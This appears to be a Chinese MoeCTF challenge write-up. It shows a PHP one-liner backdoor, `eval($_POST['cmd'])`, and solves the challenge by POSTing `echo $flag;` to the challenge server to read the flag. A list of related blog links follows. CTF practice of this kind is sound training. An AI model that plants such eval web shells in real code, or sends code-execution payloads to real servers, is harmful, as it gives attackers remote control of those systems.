题目:
听说有很多带黑阔喜欢使用这个函数留后门,你也来试试?
题目地址:http://39.108.11.206:10006

打开链接,给了一串php代码
<?php error_reporting(0); $flag="xxxxxxxxxxxxxxxxxxxx"; eval($_POST['cmd']); ?>

$_POST[‘posha’]);是获取post变量
而eval是一个php函数,他可以将字符串中的符合php语法的字符当做php代码进行执行

echo $flag; 输出flag参数

使用post接口测试工具 cmd= echo $flag;提交参数,得到flag:
moectf{eVa1_1s_aMazinG}

moectf Amazing_eval相关推荐

  1. 2019 moeCTF新生题 部分wp

    author: xiaohuihui status: 初步完成,带×的题目尚未解出,已经出官方wp 官方wp: https://github.com/XDSEC/moeCTF_2019 说明1:题目附 ...

  2. MoeCTF 2021Re部分------大佬请喝咖啡,A_game

    文章目录 大佬请喝咖啡 反编译 解释\u: z3解码 A_game 数独题: 这里判断行数据是1~9: 这里判断列数据是1~9: 9*9数独阵分为9个3*3方阵,每个方阵数据1~9 进行异或magic ...

  3. MoeCTF 2021Re部分------PE

    文章目录 ida分析 算出秘钥 解密脚本 总结 ida分析 这个题呢,目的是用附件异或一串秘钥得出一个exe,然后运行exe即可得出flag,然后秘钥主要藏在PE文件头中 算出秘钥 说实话,这题有点脑 ...

  4. MoeCTF 2021Re部分------ez(递归转循环)

    文章目录 ida 分析 总结 ida for ( i = 0; i <= 75; ++i ){Character = fuck(i * i) ^ flag[i];putchar(Characte ...

  5. MoeCTF 2021Re部分------Midpython.exe

    文章目录 Midpython.exe marshal和dis库配合: 手动改为py 解密脚本 总结: Midpython.exe python代码写成的exe,进行反编译,先搞成pyc,然后把pyc反 ...

  6. MoeCTF 2021Re部分------time2go

    文章目录 time2go keypatch使用 main_fun2(后一半) 总结: time2go keypatch使用 (ida中的keypatch插件)考点主要是玩keypatch,把sleep ...

  7. 【moeCTF题解-0x01】Reverse

    title: [moeCTF题解-0x01]Reverse categories: CTF moeCTF tags: CTF [moeCTF题解-0x01]Reverse 一个全新的领域 [moeCT ...

  8. 【moeCTF题解-0x04】Crypto

    title: [moeCTF题解-0x04]Crypto categories: CTF moeCTF tags: CTF Python Crypto [moeCTF题解-0x04]Crypto 有多 ...

  9. 2021西电MoeCTF

    MOECTF新生赛wp Web Web_Lnc ezinclude babyRCE Do you know HTTP? Crypto BabyMultiple 解题方法 为何使用hex与fromhex ...

最新文章

  1. jquery中自定义函数被事件调用
  2. ai旋转扭曲_会了这些AI技巧:效率翻倍
  3. docker运行python程序_如何使用Docker运行多个Python脚本和一个可执行文件?
  4. R金融统计:收益、随机行走和模拟
  5. echarts 4.0.4怎么下载_怎么让ECharts的提示框tooltip自动轮播?
  6. 使用Asp.net Core3Blazor 的全栈式网站开发体验
  7. $.extend()和(function($){….})(jQuery)
  8. svn常用命令与分支操作
  9. 开发实例_5G时代导热石墨散热片的开发和应用实例
  10. mysql se_常见的MySQL命令
  11. AngularJS Documents 官方英文文档
  12. android开机自动启动app,android如何实现开机自动启动Service或app
  13. 三极管开关电路_三极管在开关电路中的详细应用分析
  14. 计算机网络实验:IP协议层分析
  15. PTA 7-6 新胖子公式
  16. Java50道经典编程题:(十三)数字谜题 ——循环语句及判断符的使用
  17. 语音信号处理中怎么理解分帧?
  18. 微信小程序OnPullDownRefresh下拉刷新不触发问题
  19. 【信号与系统】(二十二)拉普拉斯变换与复频域分析——s域分析
  20. Alex 我为自己代言

热门文章

  1. 讲解MySQL最详细的一步一步安装教程
  2. 关于Linux软件工程师的招聘要求
  3. 虚拟机Linux CentOS 7安装配置Tomcat10(适用于安装任何tomcat版本!!)
  4. java洁癖_如何平衡代码洁癖和项目进度?
  5. 强烈推荐:视频该如何推广?
  6. 收藏很久的资源整合网站,一个网站一个世界
  7. python 获取百度地图上北京地铁的数据,然后excel导出
  8. 如何查看当前Word是即点即用版本还是安装版本
  9. C#版 - 小红书后台开发面试题: 二维数组中的查找
  10. 广州刷脸支付骗局_刷脸支付骗局你仔细观察一下